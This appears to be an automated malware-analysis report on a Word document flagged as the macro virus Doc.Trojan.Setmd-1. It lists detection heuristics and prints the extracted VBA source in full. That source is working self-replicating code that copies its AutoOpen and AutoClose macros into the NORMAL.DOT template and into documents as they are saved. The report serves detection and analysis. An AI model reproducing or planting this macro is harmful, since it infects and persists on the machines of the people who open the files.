MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic markers and VBA macros, including AutoOpen and AutoClose, indicating a macro-based attack. The AutoClose macro attempts to copy itself and other macros ('AutoOpen', 'yHong') into the NORMAL.DOT template, likely to establish persistence or spread further. The document body discusses company profiles and insurance history, serving as a lure to encourage users to enable macros.
Heuristics 5
-
ClamAV: Doc.Trojan.Setmd-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Setmd-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2597 bytes |
SHA-256: 4df361d9ccc111546789e984912d62d689d2d914f23a0d8860e9cb0a3b193e04 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoClose"
'yHong1s
Public Sub MAIN()
Dim TemplateName$
Dim MyFile$
Dim My
Dim OkExist
Dim i
Dim beSave
Dim X
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
' Get normal template name
TemplateName$ = WordBasic.[DefaultDir$](2) + "\NORMAL.DOT"
MyFile$ = WordBasic.[FileName$]()
If InStr(1, MyFile$, "文档") = 1 Then
GoTo The_End
Else
WordBasic.CurValues.FileSaveAs dlg
MyFile$ = dlg.Name
End If
If WordBasic.IsMacro(0) = -1 Then GoTo The_End
My = WordBasic.CountMacros(1)
OkExist = 0
For i = 1 To My
If WordBasic.[MacroName$](i, 1) = "AutoClose" Then OkExist = 1
Next i
If OkExist = 1 Then
WordBasic.Organizer Copy:=1, Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Tab:=3
WordBasic.Organizer Copy:=1, Source:=MyFile$, Destination:=TemplateName$, Name:="AutoClose", Tab:=3
WordBasic.Organizer Copy:=1, Source:=MyFile$, Destination:=TemplateName$, Name:="yHong", Tab:=1
End If
beSave = 0
If WordBasic.IsDocumentDirty() = -1 Then
X = WordBasic.MsgBox("是否保存对 " + MyFile$ + " 的修改?", "Microsoft Word", 51)
If X = 0 Then
WordBasic.SetDocumentDirty 0
GoTo The_End
End If
If X = 1 Then
GoTo The_End
End If
beSave = 1
End If
If dlg.Format = 0 Then
WordBasic.FileSaveAs Name:=MyFile$, Format:=1, LockAnnot:=0, Password:="", AddToMru:=1, WritePassword:="", RecommendReadOnly:=0, EmbedFonts:=0, NativePictureFormat:=0, FormsData:=0, SaveAsAOCELetter:=0
End If
' copy AutoOpen to active template
If OkExist <> 1 Then
WordBasic.Organizer Copy:=1, Source:=TemplateName$, Destination:=MyFile$, Name:="AutoClose", Tab:=3
WordBasic.Organizer Copy:=1, Source:=TemplateName$, Destination:=MyFile$, Name:="yHong", Tab:=1
beSave = 1
End If
OkExist = 0
For i = 1 To My
If WordBasic.[MacroName$](i, 1) = "AutoOpen" Then OkExist = 1
Next i
If OkExist <> 1 Then
WordBasic.Organizer Copy:=1, Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Tab:=3
WordBasic.Organizer Copy:=1, Source:=TemplateName$, Destination:=MyFile$, Name:="yHong", Tab:=1
beSave = 1
End If
If beSave = 1 Then WordBasic.FileSave
The_End:
End Sub
Attribute VB_Name = "AutoOpen"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.